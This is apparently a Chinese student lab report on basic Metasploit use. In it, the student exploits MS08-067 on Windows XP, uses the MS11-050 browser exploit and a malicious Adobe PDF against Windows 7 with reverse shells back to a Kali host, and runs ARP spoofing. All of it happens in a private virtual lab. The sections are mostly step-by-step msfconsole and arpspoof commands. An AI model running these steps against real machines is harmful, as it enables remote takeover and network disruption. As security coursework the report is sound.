20165229 Exp5 MSF基础应用
一、基础问题回答
解释exploit,payload,encode是什么:
- exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
- payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
- encode:是重新进行编码,伪装此次攻击,躲过查杀。
二、漏洞选择
1.主动攻击实践--ms08_067+generic/shell_reverse_tcp(成功!)
2.一个针对浏览器的攻击--ms11_050+windows/browser/ms11_050_mshtml_cobjectelement(成功!)
3.一个针对客户端的攻击-Adobe+generic/shell_reverse_tcp(成功!)
4.成功应用任何一个辅助模块--spoof arp+spoof/arp/arp_poisoning(成功&唯一!)
三、实验过程记录
(一)主动攻击实践--ms08_067
攻击机kali:192.168.43.234
靶机winXP:192.168.43.111
payload:generic/shell_reverse_tcp
- 实验前检查两个虚拟机能否互ping通
-
在Kali中打开mfs,输入指令
msfconsole
进入控制台 -
输入
use exploit/windows/smb/ms08_067_netapi
指令进行主动攻击 -
show payloads
显示可用载荷
-
set payload generic/shell_reverse_tcp
选择载荷 -
show options
显示配置信息 -
set RHOSTS 192.168.43.111
设置靶机xp IP -
set LHOST 192.168.43.234
设置攻击机kali IP -
exploit
开始攻击
(二)一个针对浏览器的攻击--ms11_050
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
payload:windows/browser/ms11_050_mshtml_cobjectelement
- 实验前检查两个虚拟机能否互ping通
-
在Kali中打开mfs,输入指令
msfconsole
进入控制台 -
输入
search ms11_050
查找漏洞 -
输入
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
选择漏洞 -
show payloads
显示可用载荷
-
set payload windows/meterpreter/reverse_tcp
选择载荷 -
show payloads
-
set LHOST 192.168.43.234
设置攻击机kali IP -
set RHOST 192.168.43.76
设置靶机win7 IP -
exploit
开始攻击
- win7下打开IE浏览器,输入上图网址
http://192.168.43.234:8080/F9nYjt
,如下图所示攻击成功,kali同时自动回连
(三)一个针对客户端的攻击-Adobe
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
payload:generic/shell_reverse_tcp
-
在Kali中打开mfs,输入指令
msfconsole
进入控制台 -
search adobe
查找漏洞
-
输入
use windows/fileformat/adobe_cooltype_sing
选择漏洞 -
show payloads
显示可用载荷
-
set payload generic/shell_reverse_tcp
选择载荷 -
set LHOST 192.168.43.234
设置攻击机kali IP -
set FILENAME 5229msf.pdf
设置生成的pdf文件名 -
exploit
开始攻击
- 把上图所示的文件夹中的5229msf.pdf文件复制到u盘里,再拖到win7中
cp /root/.msf4/local/5229msf.pdf zkj420
- 回到kali,
back
退出当前模块,use exploit/multi/handler
进入监听模块,set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.234
设置kali IP
exploit
开始监听
- win7中用Adobe9.0打开pdf文件,kali回连成功
(四)成功应用任何一个辅助模块--spoof arp
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
漏洞:spoof/arp/arp_poisoning
-
在Kali中打开mfs,输入指令
msfconsole
进入控制台 -
输入
show auxiliary
,选择spoof/arp/arp_poisoning
漏洞
-
新开一个终端,
fping -g 192.168.43.234/24
查看哪些主机也在局域网中 -
输入
arpspoof -h
查看命令使用方法 -
输入
arpspoof -i eth0 -t 192.168.43.76(win7 IP) 192.168.43.1(在此局域网中的另一主机IP)
进行ARP攻击
- win7中浏览器无法访问任何网页,攻击成功
- 回到kali,按command+C停止攻击,win7 IE浏览器可以正常访问网页